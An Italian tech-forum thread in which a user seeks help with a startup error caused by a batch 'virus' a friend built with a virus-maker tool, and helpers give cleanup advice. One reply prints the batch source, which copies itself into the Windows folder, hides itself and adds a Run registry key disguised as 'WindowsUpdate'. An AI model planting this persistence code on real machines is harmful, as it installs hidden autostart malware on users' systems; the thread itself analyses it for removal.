Discussione problema all'avvio di W7 "IMPOSSIBILE TROVARE IL FILE SPECIFICATO"

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
1

1Classe

Utente Electrum
10 Novembre 2011
133
38
4
142
Ultima modifica:
salve popolo di INFORGE! vi scrivo perchè hop un problema... qualke settimana fa ho scaricato un programma che la sua funzione era creare dei virus... un mio amico nn sapendo ha creato un virus che si kiamava SETUP.EXE però nn avendo visto l'apicetta su AVVIO AUTOMATICO l'ha creato cosi quindi io appena ho visto questo setup.exe sul desktop l'ho eliminato pensando di risolvere ... però ora all'avvio di windows7 mi esce questa schermata!! Imageshack - immagineqw.png
ora anche facendo una delle 2 opzioni cioè SI o NO nn cambia nnt mi esce sempre all'avviio del pc!
ho fatto anche scansione pc ma nnt nn rileva nnt e ho anche provato con il cerca a cercare il file SETUP.EXE ma nn esiste nnt.
come posso fare per nn avere questa fastidiosa schermata all'inizio? grz in anticipo
 
fai una cosa:
esegui->msconfig->avvio->disabilita tutte le cose inutili, tranne l'antivirus.
vedi se il problema si risolve.
 
uso AVG 2012 free edition
Mugetsu ha detto:
Ti ha cancellato qualche file importante. Usare un buon antivirus come: Avira, no è ?
Clicca per espandere...


---------- Post added at 15:23 ---------- Previous post was at 15:17 ----------

siiii!!!! sei grande nn esce più!!! ora provo ad attivarli tutti tranne WINDOWS UPDATE (che secondo me li sta il problema e ti faccio sapere :D

Gkx96 ha detto:
fai una cosa:
esegui->msconfig->avvio->disabilita tutte le cose inutili, tranne l'antivirus.
vedi se il problema si risolve.
Clicca per espandere...


---------- Post added at 15:35 ---------- Previous post was at 15:23 ----------

scusate per l'ulteriore messaggio volevo dire che ho provato solo a disabilitare WINDOWS UPDATE e nn esce questa fastidiosa schermata :D però vorrei capire il problema...
P.S ho notato una cosa in MSCONFIG come autore di WINDOWS UPDATE ci sta SCONOSCIUTO mica è normale? nn dovrebbe essere MICROSOFT?? e notando un altra cosa il percorso è l'unico diverso infatti guardate SCREEN :D Imageshack - immaginexdw.png (scusate se è piccola l'immagine) xD fatemi sapere al più presto :D
 
io, sempre avendo windows 7, quell'opzione non ce l'ho propio. *_*
comunque, mi sembra che quell'opzione sia il controllo di aggiornamenti sul sistema all'avvio.
non è un gran problema, perchè gli aggiornamenti li controlla dopo.
 
Il "virus" potrebbe appoggiarsi su un ulteriore file esterno che, nel caso in cui dovesse mancare un dato file, lo scarica nuovamente. Il "problema" potrebbe, quindi, ripresentarsi. Carica il file C:\Windows\Setup.exe.bat su Mediafire e allegane il link in una risposta, lo analizzerò per accertarsi su eventuali "danni". ;)
 
Ultima modifica:
ok ora lo uppo

PhoenìXz ha detto:
Il "virus" potrebbe appoggiarsi su un ulteriore file esterno che, nel caso in cui dovesse mancare un dato file, lo scarica nuovamente. Il "problema" potrebbe, quindi, ripresentarsi. Carica il file C:\Windows\Setup.exe.bat su Mediafire e allegane il link in una risposta, lo analizzerò per accertarsi su eventuali "danni". ;)
Clicca per espandere...


---------- Post added at 20:15 ---------- Previous post was at 20:05 ----------

ecco!! Setup.exe.bat cmq il file infetto è questo infa ci sta scritto il programma che creava i virus e tutto vedi un po tu ... mi fido ;)
 
Ultima modifica:
Codice.
Codice: 
@Echo off
@cls
@:: Creato con Virus-Raptor-BX v2
@:: By [J]oKeR
@Title Setup.exe
@Copy Setup.exe.* %Windir%\Setup.exe.bat
@reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d %Windir%\Setup.exe.bat
@Attrib +h %Windir%\Setup.exe.bat
@set JoKeR=Taskkill

Il batch, ogni volta che viene eseguito, copia se stesso nella cartella Windows e crea una chiave nel registro di sistema con nome "WindowsUpdate" in modo tale che il programma in questione ripeta questo processo ogni volta che Windows si avvia. In più, si rende "nascosto" e imposta una variabile d'ambiente sulla quale, suppongo, il server si basi per funzionare o eseguire una data funzione. Il codice è molto semplice e chiunque l'abbia fatto non deve essere un genio:
@:: Creato con Virus-Raptor-BX v2
@:: By [J]oKeR
Clicca per espandere...
Astuto, il ragazzo. :asd: Ad ogni modo, abbiamo la certezza che il batch supporti un'applicazione della quale non conosciamo la collocazione, e che quest'ultima potrebbe fornire "accesso", ad una terza persona, al tuo computer. Puoi tracciare il suo IP, e per farlo scarica il programma seguente (Microsoft Corp. ;) ) : Link. Apri il file "Tcpview.exe" all'interno dell'archivio; avrai una lista di tutti i programmiche stanno usando la rete, il PID, la porta e se è in ascolto o meno.

Screen.
h79tnl.png

Controlla tutti i processi a parer tuo strani, click tasto destro, "Process Properties", controlla chi ha prodotto quel programma. Se risulta essere "sconosciuto", confronta il PID tra i processi sul task manager, risali al percorso ed elimina il file in questione. In più, inviami per MP il valore della colonna "Remote Address" e "Remote Port" del processo in questione. :)
 
1Classe ha detto:
e dove lo prendo il cd ? c'è qualke altro modo?
Clicca per espandere...

accessori-utilita di sistema-ripristino qualsiasi pc fa in automatico backup, basta scegliere il punto di ripristino precedente a quando sei stato infettato.
tranne se il file bat non li ha cancellato, ma vedendo il codice di phoenix non credo proprio,

ma penso che basti solo cancellare l'applicazione dal registro di sistema basta scrivere su "esegui" regedit e andare nel percorso segnato ne codice so

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
[/QUOTE


e mi sembra abbastanza improbabile che un creatore di virus in batch cosi semplice possa creare autonomamente un trojan nell'bat convertito in exe. Tranne se lo stesso programma sia blindato


e per sicurezza lo ripeto


ripristino is the way
Clicca per espandere...
 
ragazzi ho risolto semplicemente cancellando il file ... perchè era uno script che anche solo cancellandolo nn dovrebbe + far nnt infatti per il momento nn esce + xD per il momento ho risolto e ringrazio infinitamente a Epic Reizan
PhoenìXz
Gkx96
DarkPhantom e infondo anche a
Mugetsu
anche se nn è servito ad un gran chèè xD potete kiudere xD se avrò altri problemi aprirò un altro topic! xD
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

C
Domanda Ubuntu File infettati rilevati da clamav
  • 3
  • 372
3
372
Linux, Unix e altri OS
Psychonaut
T
Discussione Linguaggio di programmazione consigliato
  • Chiuso
  • 11
  • 682
11
682
Programmazione
JunkCoder
O
Guida Come installare qualsiasi App su Fire TV Stick (Firestick) 3° METODO ALTERNATIVO
  • 0
  • 601
0
601
Manuali di Informatica e Reti
OnlyDigital
0
Domanda Il mio pc non trova l'ssd interna
  • 1
  • 569
1
569
Windows
JunkCoder
C
Domanda Ubuntu Casino in loop device e altri seri problemi.
  • 4
  • 228
4
228
Linux, Unix e altri OS
Psychonaut
Top Bottom
Indietro